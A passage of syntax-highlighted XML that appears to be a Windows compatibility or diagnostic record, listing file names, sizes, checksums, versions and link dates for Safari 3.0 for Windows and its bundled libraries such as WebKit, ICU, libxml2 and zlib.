#ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/26/2007 21:48:56&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/26/2007 21:48:56&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;Language Neutral [0x0]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;icuin36.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;679936&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x957D5A01&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3, 6, 0, 0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;IBM ICU I18N DLL&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;IBM Corporation and others&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;International Components for Unicode&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3, 6, 0, 0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;icuin36.dll&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot; Copyright (C) 2005, International Business Machines Corporation and others. All Rights Reserved. &quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xAF142&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/26/2007 21:47:27&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/26/2007 21:47:27&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;Language Neutral [0x0]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;icuuc36.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;1024000&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xD3DD62B5&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3, 6, 0, 0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;IBM ICU Common DLL&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;IBM Corporation and others&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;International Components for Unicode&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3, 6, 0, 0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;icuuc36.dll&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot; Copyright (C) 2005, International Business Machines Corporation and others. All Rights Reserved. &quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x105F84&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.6.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/26/2007 21:47:03&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/26/2007 21:47:03&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;Language Neutral [0x0]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;libtidy.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;319488&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x49F1708C&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x57305&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:03:32&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:03:32&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;libxml2.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;1055232&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x25DBA50F&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x107C08&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x20006&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;03/02/2007 08:30:07&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;03/02/2007 08:30:07&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;libxslt.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;197632&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xF33FEB3&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x3FD32&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x10001&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:01:57&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:01:57&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;pthreadVC2.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;47616&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xFB68A268&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;2.7.0.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;2.7.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;2, 7, 0, 0&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;POSIX Threads for Windows32 Library&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Open Source Software community project&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;2, 7, 0, 0&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;pthreadVC&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;pthreadVC&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright (C) Project contributors 1998-2004&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x11EF9&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;2.7.0.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;2.7.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/16/2007 18:14:23&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;04/16/2007 18:14:23&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;PubSubDLL.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;516096&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xC6B28210&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x8BDD8&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 17:49:07&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 17:49:07&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;Safari.exe&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;1551936&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x2C8105F1&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;Safari Web Browser&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;Safari&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;Safari.exe&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;Safari&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright Apple Inc. 2006, 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x17B3DF&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 18:03:24&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 18:03:24&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;SafariTheme.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;172032&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x6B67050C&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;SafariTheme Dynamic Link Library&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;SafariTheme&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;SafariTheme.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;SafariTheme&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright (C) 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x36376&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 16:27:52&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 16:27:52&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;SQLite3.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;352256&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xE8BEED48&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x5FEB4&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:03:25&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:03:25&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;WebKit.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;3903488&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x126C5E55&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;522.11.3&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;WebKit Dynamic Link Library&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot; WebKit&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;WebKit.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;WebKit&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright Apple Inc. 2006, 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x3C7F2E&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 17:37:37&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 17:37:37&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;zlib1.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;62464&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x537F5F1E&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.2.2.0&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.2.2.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.2.3&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;zlib data compression library&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;zlib&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.2.3&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;zlib1.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;zlib1.dll&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;(C) 1995-2004 Jean-loup Gailly &amp;amp; Mark Adler&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x10004&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x16860&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;1.2.2.0&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;1.2.2.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:03:34&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/05/2007 16:03:34&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;Plugins\npJavaPlugin.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;13824&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x80A93A9B&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;Apple Java Plug-In&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;Apple Java Plug-In&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;npJavaPlugin.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;Apple Java Plug-In&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright (C) 2006, 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x11296&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 17:50:28&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 17:50:28&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
